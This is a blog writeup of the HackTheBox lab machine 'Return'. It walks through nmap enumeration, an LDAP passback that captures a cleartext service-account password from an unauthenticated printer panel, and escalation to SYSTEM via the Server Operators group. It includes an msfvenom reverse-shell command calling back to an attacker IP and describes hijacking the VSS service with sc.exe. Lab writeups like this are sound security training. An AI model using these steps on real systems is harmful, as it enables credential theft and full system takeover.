HTB - Return Writeup

Liam Geyer

πŸ‘Ύ Machine Overview

This is a writeup of the machine Return from HTB , it’s an easy difficulty Windows machine which featured an LDAP passback attack, and local privilege escalation via the Server Operators group.

πŸ” Enumeration

An initial nmap scan of the host gave the following results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
nmap -sV -sC 10.129.95.241
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 14:08 EDT
Nmap scan report for 10.129.95.241
Host is up (0.019s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-29 18:27:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-05-29T18:27:16
|_ start_date: N/A
|_clock-skew: 18m34s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.70 seconds

Anonymous SMB and LDAP didn’t provide any quick wins.

🌐 HTB Printer Admin Panel

The site running on port 80 has an admin panel for a printer that’s accessible without any authentication

Printer Admin Panel

The settings page lists information for an LDAP server that we’re able to change. I checked the page source to see if we could read the password on the site, but it’s actually correctly censored to stars.

Printer Settings

I spun up a netcat listener on port 389, and changed the LDAP server address to my box’s ip to see if we could perform an LDAP passback.

Modified Printer Settings

Sure enough, it’s authenticating using a cleartext password for svc-printer.

Netcat Output

I used the credentials to log in and grab the flag.

Shell as svc-printer

πŸ₯‡ Root

I started by checking out svc-printerβ€˜s groups and privileges.

Privileges

Groups

We have some pretty notable groups and privileges, specifically the Server Operators group, SeLoadDriverPrivilege, and SeBackupPrivilege.

I started off by trying to exploit SeBackupPrivilege to dump the SAM and SYSTEM files, but that only resulted in hashes for local accounts that I wasn’t able to crack or pass to login.

I then tried using SeLoadDriverPrivilege and this POC to load a malicious driver, but that didn’t work either.

πŸ’» Server Operators

Members of the Server Operators group are able to manipulate services, we can use either sc.exe or PsService.exe to create a service that will start a given executable as NT AUTHORITY\SYSTEM.

I first used msfvenom to create a reverse shell in exe format.

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=6969 -f exe -o rev.exe

I then used sc.exe to change the path of the VSS service to the reverse shell, and started it.

Editing the VSS service

This popped a system level shell which I was then able to use to grab the flag.

Shell as SYSTEM

πŸ“– Resources

πŸ”— Hyperlink ℹ️ Info
SeBackupPrivilege Cybersec Notes
SeLoadDriverPrivilege POC for loading a malicious driver
Server Operators HackTricks Server Operators PrivEsc
  • Title: HTB - Return Writeup
  • Author: Liam Geyer
  • Created at : 2024-07-26 00:00:00
  • Updated at : 2024-12-07 10:14:14
  • Link: https://lfgberg.org/2024/07/26/htb/return/
  • License: This work is licensed under CC BY-NC-SA 4.0.